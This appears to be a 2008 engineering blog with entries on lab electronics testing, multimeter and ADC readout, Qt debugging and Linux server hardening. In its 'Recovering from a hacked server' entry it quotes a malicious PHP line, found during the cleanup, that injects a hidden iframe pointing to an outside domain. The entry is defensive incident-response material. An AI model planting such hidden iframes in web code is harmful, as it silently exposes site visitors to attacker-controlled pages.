A number of samples is taken from both and then on the resulting two arrays, we do a first-order fit. The offset should be 0 and the gain should be 1 otherwise an error has crept into either. For each ASIC sample, we repeat this procedure.

2008-11-04 Bitstream mode

The new project its temperature sensor (tsens) ASIC is basically a Delta Sigma analog-to-digital converter. What it basically comes down to, is that the ASIC measures temperature differences as a 1-bit value. Through calculations, a temperature comes out but that raw 1-bit value can still be read for verification purposes.

For the coming radiation test, we'll read out lots of things and among them we will be reading out the raw stream of bits.

The FPGA needs to be set in a particular mode for this:

  • Set the drdy_select register to the appropriate socket (the board is outfitted with two sockets, to test two ASICs)
  • Make the buffer for the bitstream empty by setting the buffer_flush register to 1
  • Set the sequencer_mode register to 2, which means bitstream mode
  • Set the buffer_pktsize register to 4, which means that we want four 32-bit words when we read out the buffer
  • Set the bs_mode register to the appropriate socket which starts the measurement

When this is done, the register buffer_read needs to be read out regularly to make sure the buffer doesn't overflow. The command to read out the buffer can now contain four 32-bit words.

Now it's a given that the time for measurements after radiation is very short since the samples can't be out of the radiation too long (otherwise you invalidate the test). Thus we have 60 seconds to do a measurement.

Read 64 seconds, get 8222 bits per readout, you'll get 16444 32-bit words.
Each seconds, for 0.1 second a measurement is done of 8222 bits.
The rest of the second, the tsensor stops measuring and we can read out the buffer. With a buffer packet size of four 32-bits words means 4111 times reading out 128 bits.

A nice thing about the buffer is that it's so big: a whole whopping megabyte is reserved just for the bitstream that comes out of the temperature sensor. If you don't want to disturb the process with communications from the PC, then just let the buffer fill up, wait for a minute and retrieve the whole buffer in one fell swoop.

2008-10-17 adding a logfile

My thought was; adding a logfile to our software within half an hour should be doable. So let's give it a shot!

The server has a debug macro. So obviously it'd be easiest to add it there. The macro expands to a call to a singleton, which emits a Qt signal. It's caught by a class which, amongst others, writes this stuff to the screen.

That was the first idea, but it turns out someone already made a start using syslog. Before the signal is emitted, I also added a line to write it to syslog.

Update: turns out that's a little shortsighted. I'd like to coin a new law that states that there's always more work involved than you think:

  • Removing useless stuff like date/timestamp, which is added by syslog
  • Mapping our internal log levels to the syslog priority levels

2008-10-16 analyzing a running process

Today I was notified that our custom-developed lab software suite had crashed.

Having a look, it turns out that it hadn't crashed, but using top showed in fact that it was using 100% CPU time.

First I did an strace on the process, which showed hundreds of lines looking like:

 clock_gettime(CLOCK_MONOTONIC, {836478, 309454188}) = 0
 clock_gettime(CLOCK_MONOTONIC, {836478, 311665927}) = 0
 clock_gettime(CLOCK_MONOTONIC, {836478, 313925541}) = 0

Then I decided to get a stacktrace from the process using gdb:

 labbox1:~$ gdb --pid=17732
 (gdb) bt
 #0  0xb75b3e5d in memset () from /lib/tls/libc.so.6
 #1  0x084dad4a in QTextEngine::LayoutData::reallocate ()
 #2  0x084de989 in QTextEngine::attributes ()
 #3  0x084e8c33 in QTextLine::layout_helper ()
 #4  0x084ea124 in QTextLine::setLineWidth ()
 #5  0x085211e5 in QTextDocumentLayoutPrivate::layoutBlock ()
 #6  0x08527825 in QTextDocumentLayoutPrivate::layoutFlow ()
 #7  0x0852544f in QTextDocumentLayoutPrivate::layoutFrame ()
 #8  0x08525910 in QTextDocumentLayoutPrivate::layoutFrame ()
 #9  0x08525b6c in QTextDocumentLayout::doLayout ()
 #10 0x08525c10 in QTextDocumentLayoutPrivate::ensureLayoutedByPosition ()
 #11 0x08525c98 in QTextDocumentLayout::blockBoundingRect ()
 #12 0x0852ccb6 in QTextCursorPrivate::blockLayout ()
 #13 0x0852ea62 in QTextCursorPrivate::setX ()
 #14 0x0853289d in QTextCursor::deleteChar ()
 #15 0x080b7fe8 in ScriptWindow::showOutput () at src/Debug.cpp:50
 #16 0x080b846f in ScriptWindow::runOutput () at src/Debug.cpp:50
 #17 0x0810afd9 in ScriptWindow::qt_metacall (this=0x8fcc560,
     _c=QMetaObject::InvokeMetaMethod, _id=48, _a=0xbfd419c8)
     at src/moc_Windows.cpp:248
 #18 0x08a14892 in QMetaObject::activate ()
 #19 0x08a14f54 in QMetaObject::activate ()
 #20 0x089a4786 in QProcess::readyReadStandardOutput ()
 #21 0x089a94db in QProcessPrivate::_q_canReadStandardOutput ()
 #22 0x089a997e in QProcess::qt_metacall ()
 #23 0x08a14892 in QMetaObject::activate ()
 #24 0x08a14f54 in QMetaObject::activate ()
 #25 0x08a31b61 in QSocketNotifier::activated ()
 #26 0x08a1a90f in QSocketNotifier::event ()
 #27 0x0832426f in QApplicationPrivate::notify_helper ()
 #28 0x083296b9 in QApplication::notify ()
 #29 0x08a00097 in QCoreApplication::notifyInternal ()
 #30 0x08a258dd in socketNotifierSourceDispatch ()
 #31 0xb78c1731 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
 #32 0xb78c47a6 in g_main_context_check () from /usr/lib/libglib-2.0.so.0
 #33 0xb78c4d27 in g_main_context_iteration () from /usr/lib/libglib-2.0.so.0
 #34 0x08a25a38 in QEventDispatcherGlib::processEvents ()
 #35 0x083a9665 in QGuiEventDispatcherGlib::processEvents ()
 #36 0x089ff0fd in QEventLoop::processEvents ()
 #37 0x089ff37d in QEventLoop::exec ()
 #38 0x08a014e2 in QCoreApplication::exec ()
 #39 0x083249d7 in QApplication::exec ()
 #40 0x0805d809 in main ()

After the weekend, we'll analyze this at our leisure but if anyone has helpful comments, let me know.

Update: today I saw that Debian Package of the Day highlighted memstat which is a tool displaying virtual memory usage. Pity I didn't know this earlier, since it looks really useful.

2008-10-09 Reading out a multimeter part 2

Again busy with the HP 8345A multimeter. The electronics guy suspected that the default settings were actually getting more accurate measurements than our scripts were getting.

The default settings are:

 NPLC 10.000000
 FUNC 1, .1
 APER 0.200000
 RES -1.000000
 LINE 49.985386
 NRDGS 1, 1
 RANGE .1

The above are all functions that influence the measurement accuracy. Some seem to confirm eachother, for instance the NPLC (Number of Power Line Cycles) says that we take one measurement every 10 power cycles (which is 50 Hz, like the LINE setting says), i.e. 1 sample per 0.2 seconds. That's exactly what the APERture setting displays.

Then we have the RANGE setting of 0.1 volts, which is what the second result of the FUNC setting says. So that's good too. What's funny though, is the result of the RESolution setting which returns a negative number. Will look into that later.

After talking to our electronics guy, he mentioned that -- yes he could pass these settings to the script but something still was wrong. After the script ended, the multimeter would display a faster measurement than before the script.

The problem here is that we end the script with the PRESET NORM command. The PRESET command can set the multimeter in three predefined states. Useful since you have something to turn back to. Unfortunately, the state after power-on isn't predefined. Turns out that's a separate command, the RESET command. OK, so that's fixed.

Next problem: when any script ends, the panel of the multimeter is locked out. Not even the RESET command fixes that. Turns out that's pretty easy: the Unlock button at the front of the meter.

After that another problem crops up: from the ten measurements I get back a variable number of them, anywhere between zero to seven. It probably has something to do with the way the EOI setting is done.

This was not fixable by using the EOI setting although it seemed that way for a while. In this case I found the problem (but not the cause) by sending the ERRSTR? command, where the error was TRIGGER TOO FAST.

The manual says here that the interval from one reading to the next is specified by the SWEEP command. Funny thing is, when an aperture of 0.2 seconds is set, with say 10 points then an interval time of somewhat more than two seconds should be enough. But when such a setting is made, the measurement takes up to 20 seconds and no values are actually returned.

I reverted the EOI setting back to 0 and now all the requested measurements are returned. The error TRIGGER TOO FAST still is returned though, and I don't trust the measurements as a consequence. As a workaround, we're now doing one measurement point, which doesn't trigger the error.

Update: after looking at this with a colleague, the issue turns out to be the following. There are two ways to end reading; through a character such as \n (line feed character), or through setting the EOI line high. The first way was being used incorrectly. This caused measurements to be returned while reading simple commands like 'ERRSTR?'. Now that was fixed, simple commands like ERRSTR? were working.

However, it stops working for cases when you request reading in binary format. That format might include that particular character and that's what was causing the early termination of readings.

That's all fine and dandy, but we don't want ASCII transmission of measurements -- we need the binary format since that makes the measurements faster. Roughly, taking a two-second measurement will take six seconds when taking the ASCII route.

This could be fixed by using the EOI line for binary readings. The command END can take care of this; requesting END? results in setting 2. This means: for multiple readings, the EOI line is set true when all measurements have been sent.

Combined this can work as follows:

  1. Open the GPIB device, set the EOS (End-Of-String) to \n
  2. Do some initialization
  3. Before requesting multiple measurements, disable the termination of reads when receiving the EOS (instead rely on the EOI line set high)
  4. After receiving the measurements, enable the EOS again and continue on merry way

Update 2: in the end, we fixed it another way. Instead of letting the read call stop automatically when an EOS character comes by, we just calculate the number of bytes to read. Then do a read call exactly for those. After eliminating the SWEEP command, we also eliminated the TRIGGER TOO FAST error! Hurray!

Also found out that the RES (resolution) setting returns -1 because it's determined automatically from the NPLC setting.

2008-10-03 Software architecture decisions

Today I bumped into a problem which required some decisions about the software. In short it comes down to the following.

We have control scripts (in Perl) which fire off Command Packets to the server. The server is connected to multiple daemons which handle tasks. When receiving a Command Packet, the server broadcasts it to all daemons.

When the daemon replies with a Response Packet, the server broadcasts these to all connected scripts.

Problem is, that broadcast isn't always useful. There could be multiple scripts, giving off commands, and these are all broadcasted. Thus it could be that scripts receive the wrong answer.

Now a solution for this:

  • Create a special packet
  • Eliminate the first broadcast for the new packets
  • Eliminate the second (response) broadcast for the new packets

After some hacking, what remains is the return packet. It shouldn't be broadcasted but the tree of classes seems to point to itself again. Could this be the Friday evening effect?!

Update: partly, it was the Friday evening effect. What was happening is that the return packet is not broadcasted, but instead is neatly redirected back to the sending Connection object.

Currently the Perl library uses a number within the packet to determine what to do with it, the APID (APplication IDentification). However this APID is separated in two types; a hardware and a software APID. The packets with a hardware APID are passed by the daemons straight to the connected hardware, and it's currently used for a binary data, not ASCII. The software APID is unique per daemon. Thus sending a packet needs to include the daemon its software APID.

New planning:

  • Include the software APID when sending packets from the Perl scripts
  • When the response is sent from the daemon, the software APID needs to be set in the response packet.
  • When the response is received in the Perl library, we need to know that when a software APID is present, the packet contents need to be treated in another way

Some important things to remember about this architecture:

  • There is not one single place which maps a particular request to a particular response -- thus it's possible to send packets with one APID, and have the response contain another
  • It's implicit that a request packet triggers a broadcasted response
  • When something else than a hardware APID is sent, the server assumes the packet is meant for the server itself
  • A packet for the server is in the form of two integers, a command and a value (an example of this is the setting of timeouts)

2008-09-22 Reading out a multimeter

We'd like to test the DAC board by reading it out with an HP 3458A multimeter (now Agilent, but this is a pre-spinoff model). It's attached through a GPIB interface with the PC we're running our software on.

hp 3458a.jpg

Currently, we've got some Perl scripts that were used in a previous project however we want long integration times for accurate measurements. The currently used Perl code doesn't allow this.

The current situation is as follows. The multimeter has a trigger arm event (command TARM),,a trigger event (command TRIG) and a sample event (several commands). Normally, all are set to AUTO and the display of the meter shows continuously updating readings. The current code sets TRIG to SYN, which means 'make a reading when GPIB commands you to do so'. Then it does some other setup and before making a reading, sets TRIG to SGL, which means 'do one measurement then disable readings'.

The resolution is set more or less automatically because a range is passed (1.2V) when selecting DV voltage measurement. The SWEEP command is then used to take any number of samples.

But now we want to have long sampling times.

The existing solution was to set the APER command (aperture), which has a value between 0 and 1 seconds, specified in 100ns steps.

Since we wanted longer measurement times, we'd use the NPLC command. NPLC stands for 'Number of Power Line Cycles'. This is useful since measuring for a whole cycle will reduce noise from the incoming power line.

In The Netherlands, the power from the wall socket has a frequency of 50 Hz. Thus if we want to measure for 100 cycles, we'd measure for two seconds.

Funny thing is, that's not what the script does. There are a number of set-up steps before the measurement is taken and I'd like to eliminate those (or at least, move them to the initialization phase).

There's for instance the RATIO command, which is set to OFF. This command measures both your signal and a reference voltage, then returns the division of those. We don't need this and the default setting is OFF. So I eliminated this command from the script.

To find out whether the ratio setting really defaulted to 0, I tried to read the setting from the multimeter. This worked, but besides the setting I received a load of garbage as well. I'd like to find out why that happens.

2008-09-16 Tweaking TCP

For the Telis project, we use the TCP protocol for the radio uplink. This is rather unusual since most other balloon flight projects use UDP and use their own retransmission and sequencing algorithms.

It has worked well for us previously, but we want to have more insight and diagnostics in a flight situation. Also, there's a backup function present in the software that's running on the PC104 on the balloon. Normally, it's not switched on and we'd like to automatically switch it on when a transmission occurs.

To gain more insight in the quality of the radio uplink, we think iptraf will do fine. A screenshot with the detailed statistics for an interface:

 - Statistics for eth0 ---------------------------
                Total      Total    Incoming   Incoming    Outgoing   Outgoing
              Packets      Bytes     Packets      Bytes     Packets      Bytes
  Total:         3142     621643        1665     131825        1477     489818
  IP:            3142     577645        1665     108505        1477     469140
  TCP:           2903     548408        1434      79900        1469     468508
  UDP:            238      29201         230      28569           8        632
  ICMP:             0          0           0          0           0          0
  Other IP:         1         36           1         36           0          0
  Non-IP:           0          0           0          0           0          0
  Total rates:         51.7 kbits/sec        Broadcast packets:          222
                       30.4 packets/sec      Broadcast bytes:          31189
  Incoming rates:       9.2 kbits/sec
                       15.8 packets/sec
                                             IP checksum errors:           0
  Outgoing rates:      42.5 kbits/sec
                       14.6 packets/sec

Note the IP checksum errors. This one would be pretty interesting for us.

Now what we probably also want, is a way to find out how many resends will occur if the radio uplink fails temporarily. We'd probably want to be gentle and not resend too much since the uplink is pretty limited bandwidth-wise. I have found a way to check this per application (man tcp, search for TCP_INFO) but not per interface.

A nice thing to use for testing purposes is Netem, the Linux in-kernel packet mangling software.

2008-08-29 Fighting an ADC

We use an ADC from Cirrus Logic on the DAC board. It's there to check the requirements for noise and linearity of the DAC (and subDACs).

It's the same ADC that we used in the Telis project. It's a nice piece of work, very accurate. For Telis it was used to measure in the hundreds of nanovolts.

dac board adc.jpg

On the DAC board however, there seem to be problems with linearity. Around zero volts, it seems to jump up and down a little. It wasn't just this sample; the ADC was lifted off the board and replaced with another -- the same problem was seen.

The gain on the ADC was lowered and the effect was still seen in the same way, so it's not the DAC that's causing the trouble. This indicates that the ADC or its placement on the board is the problem.

It's probably that last thing since with Telis it worked wonderfully, but that isn't conclusive because back then, the voltage around zero was looked at, but not very carefully.

What we'll now do is firstly use external measurement equipment and secondly, fire off an e-mail to Cirrus Logic support.

Another problem is that the ADC now gives off some REAL funny numbers after some changes in the FPGA. After a full day of analysis with three people (software engineer, FPGA engineer and analogue designer), we come to the conclusion that... the power must be shut down. You'll ask why wasn't this done right away. We did -- except the command that powers off the digital and analogue parts of the board do NOT affect the power of the ADC... That was one of the requirements.

However it remains to be seen whether this fixes the problem of non-linearity around zero.

2008-08-12 Configuring an ADC

On the DAC board, for testing purposes, a Cirrus Logic ADC is present.

It's the same ADC as used in another project. These babies are pretty well-versed feature-wise, as far as my experience goes anyway. The one we use (CS5534) has four channels, each of them with its own configuration registers for selecting measurement time, range selection, offset enablers, offset registers, et cetera.

What's different here is the FPGA in between the software and the ADC. In the previous project, I'd just write the configuration register for a certain voltage range and kick off a macro contained in the FPGA flash. Read back results and voilà.

Occasionally, I'd do those detailed steps in a script and the steps would be:

  • Set voltage range
  • Set measurement time
  • Wait for results
  • Read back results and convert

Currently, it's a bit simpler: just read out and convert.

2008-08-07 Controlling individual DACs

I've written previously about the DAC board, but mainly looking at it as a black box. This time it's time to look at the inner workings.

We perform two tests on the DAC, noise measurements and linearity. The complete range of the DAC is actually covered by five small DACs inside the package, which have a 7-bit range. Although normally we just control the main DAC and let the FPGA/DAC combo figure out what happens next, when the noise and/or linearity tests don't measure up to expectations, we need to look further.

That's why there's a special override register that can be enabled (set to 1) which allows us to control the five small DACs directly. This is done through two 32-bit registers, in a kind of funny way:

First register, called testd1, holds bits 19 to 0 in the table below. Register testd2 holds bits 34 to 20. The highest bit is the most significant bit (MSB).

bit meaning
34Bit 7 (MSB), DAC 1
33Bit 7 (MSB), DAC 2
32Bit 7 (MSB), DAC 3
31Bit 7 (MSB), DAC 4
30Bit 7 (MSB), DAC 5
29Bit 6, DAC 1
28Bit 6, DAC 2
27Bit 6, DAC 3
26Bit 6, DAC 4
25Bit 6, DAC 5
24Bit 5, DAC 1
23Bit 5, DAC 2
22Bit 5, DAC 3
21Bit 5, DAC 4
20Bit 5, DAC 5
......
......
1Bit 1 (LSB), DAC 4
0Bit 1 (LSB), DAC 5

Et cetera. Note the interleaving of bits. Since testers use scripts for this, we need to create a simple function which makes it easy to control the DACs separately.

In the end, I created a function which does the following:

  • Retrieves the current registers
  • Turns the user-requested value into a binary string of ones and zeroes
  • For each bit of the new value the registers are updated
  • When done, the registers are written and activated

2008-07-01 testing temperatures

Today I configured the housekeeping feature of our Generic EGSE software (stands for Electrical Ground Support Equipment) and added a couple of temperature sensors from the DAC board. I then configured the software to plot the requested values over time; see below.

temp dac.png

Then we sprayed the sensor with Cold Spray and watched the strip chart dive:

temp dac2.png

Time to show our setup:

IMAGE 497.jpg

2008-06-26 Layout Shamroc board

Below are details of the Shamroc DAC testing board.

IMAGE 496.jpg

  1. Daughterboard, for DAC 1 (DAC not present yet)
  2. Daughterboard, for DAC 2 (daughterboard not present yet)
  3. Filtering, plus the high-accuracy ADC is here as well (which measures back whatever the DACs set)
  4. Reference power
  5. Controlling of heaters
  6. Two housekeeping ADCs, with lower accuracy than the one that's located at 3
  7. Power for DACs and filtering
  8. Power supplies
  9. Additional input for power
  10. Barrier
  11. Additional clock input for DACs
  12. Connection from FPGA
  13. Connection from FPGA for the DAC clock signal (40 MHz)
  14. Output DACs
  15. Output reference power

Interesting stuff:

  • If the clock coming from the FPGA won't live up to our expectations during testing, we can use another source and hang it on the connectors marked by 11.
  • The clock from the FGPA is slightly set apart from the bigger data connection, because the harmonics from that 40 MHz signal have a higher chance of interfering with the data lines. Note that at a later time, we'll have a 1 Hz synchronization pulse coming in from outside. This is because our electronics are only part of the whole system and there must be a system-wide clock as well. Otherwise our clocks would deviate as time progresses (think days here).
  • There's another clock coming in at 1.25 MHz for the housekeeping ADCs, on the wide ribbon.
  • The input marked with 9 is there to test the stability of the DACs. We can feed in funny signals and this shouldn't influence the output of the DACs, marked with 14.

2008-06-23 Shamroc DAC board

The DAC testboard for the Shamroc (part of Exomars) project is now under test. This board is meant to test the extremely stable DACs that the project needs. The stability is necessary because the DACs will control the seismometer, which in turn needs very long measurement times. The accuracy of the DACs will thus directly influence the measurements.

Here is a good presentation on the seismometer itself: 9_Smit_GEP-SEIS.pdf

The image below is the test configuration of the seismometer.

seis.jpg

After reading the documentation, I personally was left with a bunch of questions. An appointment tomorrow will change all that.

Questions from a software engineer:

  • What is meant by 'very broad band' seismometers?
  • What is meant by 'seismometers in opposite sensing directions'? Is there a direct relation between the number of ADCs and sensing directions? If so, don't these ADCs have channels for that?
  • Does the GEP-Sphere (the package with the seismometers) contain everything for all directions? How many sensing directions are there?
  • How is the sensitivity compared to earth models?
  • Why is the instrument noise dominated by electronic noise?
  • How should the performance requirements be read?
  • Explanation of the subsystems in the ASIC
  • Why are commercial 24-bits ADCs not really 24 bits? Are we just measuring noise on those highest-accuracy bits? Why? Couldn't we cool it?
  • Why is 1/f elecronic noise (pink noise) the biggest problem?

Update following soon.

2008-06-19 Project SHAMROC

For project SHAMROC, part of the Exomars mission, the testing will start next week.

shamroc dac bord.jpg

This project develops mixed-signal ASICs which have DAC, ADC and temperature sensing functions and the first prototypes will arrive next week. I say prototypes, plural, since the functions are divided onto several ASICs for now. Later, these functions will be integrated on a single die.

This is exciting stuff. These electronics have to conform to the highest demands. Since we're talking about a Mars mission, the ASICs will have be operating in extreme temperatures. The weight has to be the lowest possible, and the limits on energy consumption forces us to use the minimum amount of components. And because of the conditions of the trip, as well as Mars conditions, the components have to be radiation-hard.

When the ASICs arrive, the software group has a generic workbench for testing them. We'll then work together with the electronics guys to make solid, reproducible tests.

2008-05-31 Test for a sysadmin

As part of an interview for a new system administration, we asked the following questions:

General:

  • Background?
  • With which Unix-like systems have you had experience?
  • How many machines or users?
  • Can you name some control panels? Which one have you supported?

Administration:

  • Which filesystem does Linux use?
  • What is journalling?
  • What's an inode?
  • What happens when you delete a file while an application has it opened?
  • What is: NFS? NIS?
  • What is Kerberos?
  • Which webserver do you have experience with?
  • What is a wildcard DNS entry? How would you configure Apache for that?

Network:

  • Do you know how to tunnel traffic?
  • Do you know what OSI layers are?
  • Where does TCP fit in?
  • What is ICMP? Where does it fit in?

Network above layer 4:

  • What is SMTP?
  • What's the difference between IMAP and POP3?
  • Why are both protocols insecure? How to handle this?
  • What's DNS?
  • Did you administrate DNS servers?
  • What does it mean when a server is authoritative for a domain?
  • How do you look up the name servers for a domain?
  • What are virtual hosts in the HTTP protocol?

Network layer 4 and below:

  • What's the difference between UDP and TCP?
  • What's a gateway?
  • What's a multi-homed machine?
  • If there are two network interfaces on a machine, how many IP addresses can you use?

Security:

  • How do you stay up-to-date on security news?
  • How do you check for open ports?
  • What is jailing?
  • What is selinux?
  • When is a firewall called for, in your opinion?
  • How would you go about setting up a firewall?
  • What is intrusion detection?

2008-05-25 Finding open ports

When tightening up security on a Linux server, one of the first things the system administrator does, is find out which ports are open. In other words, which applications are listening on a port that is reachable from the network and/or internet.

We'll use netstat for this purpose. On a prompt, type:

  $ sudo netstat --tcp --listen -p

Overview of the options:

--tcp Show applications that use the TCP protocol (exclude UDP)
--listen Show only applications that listen, and exclude clients
-p Show the process ID and name of the application to which the port belongs

Netstat sometimes pauses during output. This is normal; it tries to resolve the addresses into human readable host names*. If you don't want this, use the -n option.

Example output from my laptop which runs Fedora 8 (I have removed the columns Foreign Address and State for the sake of brevity):

 Active Internet connections (only servers)
 Proto Recv-Q Send-Q Local Address                PID/Program name   
 tcp        0      0 telislt.sron.nl:irdmi        2381/nasd           
 tcp        0      0 *:55428                      1965/rpc.statd      
 tcp        0      0 telislt.sron.:commplex-main  6573/ssh            
 tcp        0      0 *:mysql                      2307/mysqld         
 tcp        0      0 *:sunrpc                     1945/rpcbind        
 tcp        0      0 192.168.122.1:domain         2533/dnsmasq        
 tcp        0      0 telislt.sron.nl:privoxy      3581/ssh            
 tcp        0      0 telislt.sron.nl:ipp          2553/cupsd          
 tcp        0      0 telislt.sron.nl:smtp         2352/sendmail: acce 
 tcp        0      0 *:8730                       6030/skype          
 tcp        0      0 *:http                       2371/httpd          
 tcp        0      0 localhost6.localdom:privoxy  3581/ssh            
 tcp        0      0 *:ssh                        2205/sshd

Whenever there is an asterisk (star) instead of a host name, netstat tells us that the port is listened to on ALL interfaces, not only the local interface but also any present interfaces connected to the outside world. These are the ones we want to hunt down.

Now we know the program names, we can find out more about them. We'll take for instance the rpc.statd program. First we locate the complete path of this process:

 $ whereis rpc.statd
 rpc: /sbin/rpc.statd /usr/sbin/rpc.svcgssd /usr/sbin/rpc.idmapd 
 /usr/sbin/rpc.mountd /usr/sbin/rpc.rquotad /usr/sbin/rpc.gssd 
 /usr/sbin/rpc.nfsd /etc/rpc /usr/include/rpc

Whereis does a search and finds /sbin/rpc.statd. On RPM-based systems, we can request more information about the owning package:

 $ rpm -qif /sbin/rpc.statd
 ....
 The nfs-utils package provides a daemon for the kernel NFS server and
 related tools, which provides a much higher level of performance than the
 traditional Linux NFS server used by most users.

Now we know whether we want this package or not. If not, just remove it and the port will be closed. If we need the functionality, does it need to listen to the outside network? If not, we would typically Read The Fine Manual to see whether we can configure this package to listen locally.

Repeating this exercise for each line in the netstat output will tighten a server its security.

  • Just like addresses are resolved into host names, the port numbers are resolved into services using the /etc/services file.

2008-05-22 Configuring AIDE

Today I installed AIDE on a CentOS 5 server. This package is an alternative to the traditional Tripwire. The installation is done in a cinch with yum:

 $ sudo yum -y install aide

The first thing that happened, was that this server had SElinux disabled. So I had to make the following changes to the supplied configuration file /etc/aide.conf

I added the following lines close to the top; these are copies of default rules but without the selinux checks (which would otherwise generate errors):

 R =            p+i+n+u+g+s+m+c+acl+xattrs+md5
 L =            p+i+n+u+g+acl+xattrs
 > =            p+u+g+i+n+S+acl+xattrs
 DIR = p+i+n+u+g+acl+selinux+xattrs
 PERMS = p+i+u+g+acl

Then as root, initialize the database:

 $ sudo aide --init
 AIDE, version 0.13.1
 ### AIDE database at /var/lib/aide/aide.db.new.gz initialized.

Copy the new database, to make it the baseline to check against:

 $ sudo cp /var/lib/aide/aide.db.new.gz /var/lib/aide/aide.db.gz 

Then create a file named aidecheck in /etc/cron.daily with the following contents:

 #!/bin/sh
 /bin/nice -n 18 /usr/sbin/aide --update | \
    /bin/mail -s "AIDE check on host  `hostname`" root
 cp /var/lib/aide/aide.db.new.gz /var/lib/aide/aide.db.gz

Be sure to make the file executable:

 $ sudo chmod 755 /etc/cron.daily/aidecheck

2008-05-21 Code review

I'm doing a code review for our partner in the current project. In a recent
integration test, we found a problem.

An overview of the equipment. We're talking about software running on a
PC104 device (basically a small PC) running Linux. This PC104 has a bunch of
serial ports.

They have a custom I/O card, let's call it Raba1. This card has two serial
ports. The software reviews the incoming data from port TTY2, thinks about it and
then sends the appropriate commands on the TTY1 port. Problem is, sometimes
the software just halts for a minute. It does nothing while actually data was
coming in.

One thing that can go wrong here, has its root in the structure of the
software. It basically runs in a big loop, at the start of which is a select()
statement which monitors the two serial ports and the internal command channel
for input.

A theory is that it's missing data because the loop isn't fast enough. It
could happen that we send commands to the software through the internal
command channel and while these are parsed and handled, other data comes in
through port TTY2.

What makes this unlikely, is that such buffer overflows can be detected by the
Linux serial device driver. These were watched and were not found to correlate
with the pauses.

2008-05-06 Recovering from a hacked server

A friend of mine had a problem with a server in which a particular PHP script kept changing, including an iframe when it shouldn't.

I took the following steps to see what was happening. This can be used as a checklist.

  • Checked /etc/passwd for strange accounts
  • Did a 'ps -ef' to see what processes were running
  • Checked /var/log/secure for strange logins through SSH
  • Checked for other services running, for example FTP. Checked the logins on that as well.
  • Checked /tmp to see whether any executables were present
  • Checked Apache's default access logs
  • Checked Apache's access logs for each virtual host, paying attention to POST requests
  • Checked world-writeable and tmp directories in user home directories
  • Checked what's in the crontabs
  • Checked the OS version. In this case, found it by doing
  # cat /etc/redhat-release
  CentOS release 4.6

I found nothing weird in Apache's log files, no funny scripts et cetera.

In a bunch of PHP scripts, the following code was appended at the end:

 echo '<iframe src="http://apartment-mall.cn/ind.php" width="1" height="1"
 alt="YTREWQhej2Htyu" style="visibility:hidden;position:absolute"></iframe>';

Googling for this turned out it's a pretty common attack. Articles suggest it might be a compomised FTP account. Checking the changed files, the date of the files suggests it's done in one fell swoop.

To see what FTP servers are running:

  # ps -ef

In case I missed anything, see what ports are listened to:

  # netstat --listen --ip -T -p

The -T option won't cut off long addresses and the -p option will print the process that's doing the listening.

Found out in /var/log/messages that a script logged in around the same time that the files were modified.

The conclusion was that a full OS reinstall was done, with a thorough tightening-up and a code review.

2008-05-06 CSS box model

Lately I've been lurking on the #CSS channel on the Freenode IRC server and I've noticed a lot of questions that basically boil down to a developer not understanding the CSS box model.

The most basic things to remember are, in my opinion, the following.

There are block and inline elements. In simple terms, block elements get a newline after them. Elements like div and p are block elements. Inline elements usually reside in a block element; think of them as stuff you'd put in a paragraph. Anchors and markup like em are all inline elements.

Then there is floating. If you let elements float left or right, they'll "float" to the top of the containing element. Floating elements must have width applied to them. Multiple elements will float nicely besides eachother if there's room.

When you've got a problem, think about the above two things and see if you can figure out what's happening. Don't just ask in the #css channel "what's happening", try to come up with a theory and state it. It'll help you a great deal more.

Also read Mike Hall's primer on CSS Positioning.

2008-04-16 Qt database widgets part 2

Last time I got away with creating a custom QItemDelegate but not this time. I need a radiobutton for a database column of which all rows must contain 0 (zero), except one row which must be set to 1 (one). This database column designates the default or current setting.

Presenting the user with a 1 or 0 isn't terribly friendly. Since a QItemDelegate is about both presenting and editing, this is an obvious candidate to be subclassed.

A nice example is the Spin Box Delegate, however, this example creates an editor but not a custom paint method for the normal viewing of the item.

2008-04-16 Qt database widgets

I've been playing with a couple of Qt classes to get an easy-to-use SQL user interface. The combo QTableView and QSqlTableModel seemed very nice. Using the Designer, I could click an interface together and voilà, a nice grid where the user can edit the database.

There were a couple of hicks. If fields were NULL in the database, these could be filled in but never put back to NULL. After reading and trying out lots of stuff, I found the following classes are involved:

QTableView Provides the general table widget on the screen
QItemDelegate Provides view/edit functions for specific cell types in the table widget on the screen
QSqlTableModel This class provides an easy-to-use API for a database table
QAbstractProxyModel A class that can be stuck over QSqlTableModel to transform, sort or filter data when it comes in or goes out of the QSqlTableModel

You have to think about what functions exactly you want to change. If it's the overall interface, think about the QTableView. In my case, I wanted to enable the user to set fields to NULL. The normal QItemDelegate doesn't allow this.

In the end I avoided the whole issue by using one type field (which can contain 'string', 'integer', 'double' et cetera.

2008-04-15 Opera schade

Always fun, browser wars. Especially in the office.

opera schade.png

For those not in-the-know: the markup is typical for the warnings on packages of cigarettes in the Netherlands. Translation: "Opera causes severe harm to you and others around you".

Stuck on an Opera promotional poster in the office.

2008-03-31 Filtering on packet size

I was asked recently to check how UDP packets could be filtered which don't
have any contents. The reason was that these packets were used as a Denial of
Service against a specific game server. This bug had been acknowledged by the
developers of the server, but had been fixed in a later version and wouldn't
be fixed in the older one.

iptables can filter on this as follows:

  $ sudo iptables -A INPUT -p udp --dport 6500 -m length --length 28 -j REJECT

Why the length is 28, I can't really say. It's of course UDP over IPv4. UDP
has a fixed header size, but IPv4 has a variable header size. Anyway, I've
tested the above using netcat:

Start service listening to port 6500 on machine 1:

  $ nc -l -u -p 6500

Open a new terminal on machine 1 and start a traffic dump:

  $ sudo tcpdump -X -vv "port 6500"

Set up a client on machine 2, which sends all input from stdin to machine 1:

  $ nc -u machine1 6500

Now type some text, then press enter. The server will output whatever you
typed. Now just press enter. You're sending a UDP packet with as a content the
enter \n. tcpdump should display:

 16:20:43.898341 IP (tos 0x0, ttl  64, id 65431, offset 0, flags [DF],
 proto: UDP (17), length: 29) machine1.6500 > machine2.36237: [bad udp
 cksum 26d!] UDP, length 1
        0x0000:  4500 001d ff97 4000 4011 ca51 ac10 8cb7  E.....@.@..Q....
        0x0010:  ac10 8c0e 1964 8d8d 0009 7101 0a         .....d....q..

Lengte 29 thus means: subtract one and get an empty UDP packet.

If that length doesn't work, you can play with ranges. For example "--length
20:30" means: reject everything between 20 and 30 bytes length.

2008-02-07 the WTF count

As inspired by the comic WTFs per minute, we'd thought that besides statements like TODO and FIXME, we would 'really' like vi to highlight the string WTF.

First, you need to locate the syntax file:

 $ locate syntax/c.vim
 /usr/share/vim/vim70/syntax/c.vim

